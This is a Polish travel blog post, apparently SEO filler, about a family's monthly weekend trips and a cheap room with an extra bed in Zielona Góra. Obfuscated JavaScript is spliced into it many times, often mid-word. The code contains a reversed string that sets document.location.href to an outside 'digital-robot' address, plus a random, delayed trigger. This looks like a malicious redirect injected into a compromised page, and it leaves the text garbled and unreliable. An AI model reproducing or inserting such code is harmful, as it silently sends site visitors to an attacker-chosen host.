Na weekend jedziemy do Zielonej Góry

Kilka miesięcy temu postanowiliśmy z żoną i naszym synkiem, że będziemy zwiedzać nasz piękny kraj. Zrezygnowaliśmy całkowicie z tegorocznych wakacji, a w zamian za tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to budżet postanowiliśmy przeznaczyć na pojedyncze weekendy, które spędzamy w najpiękniejszych miejscowościach turystycznych. W następny weekend jedziemy do Zielonej Góry, w której jest ponoć naprawdę pięknie.

Znalazłem tanią kwaterę z dostawką

tanie kwatery zielona góraNasz synek ma dopiero siedem lat, więc zamawiając noclegi na te nasze weekendy zawsze korzystamy z opcji pokoju dla dwójki dorosłych z dostawką. Jest tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to nic innego jak dodatkowe łóżko przeznaczone dla dziecka i ustawione w tym samym pokoju. Nazywa się tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to dostawką, bo bardzo częstobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to jest po prostu przenoszone z pokoju do pokoju w zależności od potrzeb gości. Taki pokój jest też tańszy niż pokój trzyosobowy, który najczęściej wygląda dokładnie tak samo jak dwuosobowy z dostawką. Jeśli chodzi o naszą kolejną wycieczkę tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to tym razem znalazłem naprawdę tanie kwatery Zielona Góra ponoć słynie z tego, że ceny noclegów są tam bardzo atrakcyjne. Noclegi mamy opłacone od piątku do niedzieli, ponieważ na weekend wyjeżdżamy w piątek po pracy. Nasz syn kończy lekcje około południa, a my kończymy pracę około piętnastej. Na taki wyjazd zawsze pakujemy się dzień wcześniej, dzięki czemu w piątek po pracy możemy od razu wyjeżdżać. Nawet nie jemy obiadu, tylko zatrzymujemy się po drodze w restauracjach oferujących jedzenie do samochodu.

Nasza tegoroczna koncepcja dotycząca zamiany tygodniowych wakacji na regularne weekendowe wyjazdy okazała się bardzo trafna. Taki wspólny wyjazd pomaga nam naładować akumulatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tory na cały miesiąc. Staramy się wyjeżdżać gdzieś na weekend minimum raz w miesiącu. Za każdym razem wybieramy sobie inne ciekawe miejsce do zwiedzenia.